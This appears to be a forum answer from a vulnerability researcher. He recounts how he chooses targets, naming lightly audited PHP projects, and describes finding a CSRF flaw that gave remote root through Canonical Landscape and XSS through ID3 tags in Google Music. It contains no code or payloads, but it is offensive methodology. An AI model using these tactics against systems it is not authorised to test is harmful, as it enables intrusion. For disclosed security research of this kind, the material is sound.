2 Answers
2

I audit a lot of code, I write exploits, and I have accumulated more than 50 CVE's over the course of about 6 years of bug hunting.

When I went on my first serious bug hunt I was looking for weak projects that had not be extensively audited by the community(or milw0rm back in the day). To do this I used SourceForge's Advanced Search, which has changed a lot. Basically I was looking for a PHP project that people where downloading and using, but wasn't very popular. Lets say around ~1,000 downloads and less than 1 year old. I found Ultimate PHP Board which turned out to be very insecure.

As time progressed I got bored with insecure projects so I changed my tactics entirely and started going after popular projects. For example I exploit PHPMyAdmin which is the most downloaded PHP application.

After years of penetration testing and application development you get a kind of 6th sense into how the code works and where the problem areas can be. You can look at a piece of functionality and write an implementation in your head and pick out where things could go wrong. So on a penetration test I always ask my self the same question: "What is the worst that could happen?". And then go out and focus my testing based on this question.

I'll give you a good example. I saw an advertizement for Canonical Landscape (Maker of Ubuntu). In the ad it showed a feature of Landscape where you could execute a command on every machine you own as root. I thought to my self, "What if it was vulnerable to CSRF?". I signed up for a free trail, and sure enough, you could gain remote root on every machine using a single forged HTTP request. Outch! (I also got remote root on cPanel with CSRF, and I earned a severity metric :)

Another flaw I found in Google Music, I uploaded an MP3 that had JavaScript in all of the ID3 tags. Sure enough the artist and album names where being printed to the page, and I got $500 from the bug bounty program with my very first test. One of the reasons why I chose this input is because i knew it wouldn't be exercised by a dumb vulnerability scanner. Its as if I knew it would fail ahead of time. That kind of innate understanding only comes with years of practice.